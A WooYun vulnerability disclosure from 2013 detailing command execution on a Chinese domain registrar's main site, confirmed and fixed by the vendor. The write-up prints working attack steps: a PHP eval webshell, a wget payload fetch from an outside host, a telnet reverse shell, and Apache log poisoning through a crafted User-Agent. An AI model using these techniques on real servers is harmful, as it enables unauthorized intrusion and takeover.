当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-026945

漏洞标题:新网互联主站命令执行漏洞主站沦陷(非struts漏洞)

相关厂商:北京新网互联科技有限公司

漏洞作者: 瞌睡龙

提交时间:2013-06-26 12:28

修复时间:2013-08-10 12:28

公开时间:2013-08-10 12:28

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-26: 细节已通知厂商并且等待厂商处理中
2013-06-27: 厂商已经确认,细节仅向厂商公开
2013-07-07: 细节向核心白帽子及相关领域专家公开
2013-07-17: 细节向普通白帽子公开
2013-07-27: 细节向实习白帽子公开
2013-08-10: 细节向公众公开

简要描述:

主站的命令执行~嗷

详细说明:

一处犀利的命令执行

xw1.jpg


pwd看向当前网站路径:
/home/member/www/live/domainv2
找是否有可写目录:

xw2.jpeg


果断写shell啊
echo "<?php eval(\$_POST[l])?>" > /home/member/www/live/upload/111.php
cat下看看
cat /home/member/www/live/upload/111.php

xw3.jpeg


妈蛋的什么都没有,什么情况,可能有特殊字符过滤了,继续黑盒测试。
换wget再试试:
wget http://bluetest.duapp.com/eval.txt -O /home/member/www/live/upload/zzz.php
依然失败。
linux一条命令直接反弹端口回来试下:
telnet x.x.x.x 1111 | /bin/sh | telnet x.x.x.x 2222

xw4.jpeg


发现弹回来了,但是会马上断开连接,后来才知道FreeBSD的是Unix的不支持这种。。。

xw5.jpeg


把shell写进系统里,然后mv到web目录下试试~
试一下apache日志的方式
进程中找到apache的路径
ps -aux
找到apache配置文件
cat /usr/local/apache/conf/httpd.conf
找到日志地址
tail -100 /usr/local/apache/logs/access_log

xw6.jpeg


把浏览器UA改成
<?php eval($_POST[l]);?>
然后tail几遍看看日志

xw7.jpeg


干的漂亮,导出到web目录试试~
tail -1000 /usr/local/apache/logs/access_log > /home/member/www/live/upload/a.php
访问一下a.php:

xw8.jpeg


一句话连接
http://www.dns.com.cn/upload/a.php

xw9.jpeg


你也可以试下grep出eval来导出大小会小很多,不过1000行还好~
看了下/var/log目录下的一些日志文件:
检查新生成php文件
/var/log/find_new_php.log
检查危险函数
/var/log/check_dangerous.log
监控做的挺好,但是检查出的那么多危险函数怎么就不管了呢~

漏洞证明:

修复方案:

正则匹配严格些,逻辑上别出问题。

版权声明:转载请注明来源 瞌睡龙@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-06-27 09:26

厂商回复:

问题已经确认,并修复了。太郁闷了,2次死在同一个沟里。

最新状态:

暂无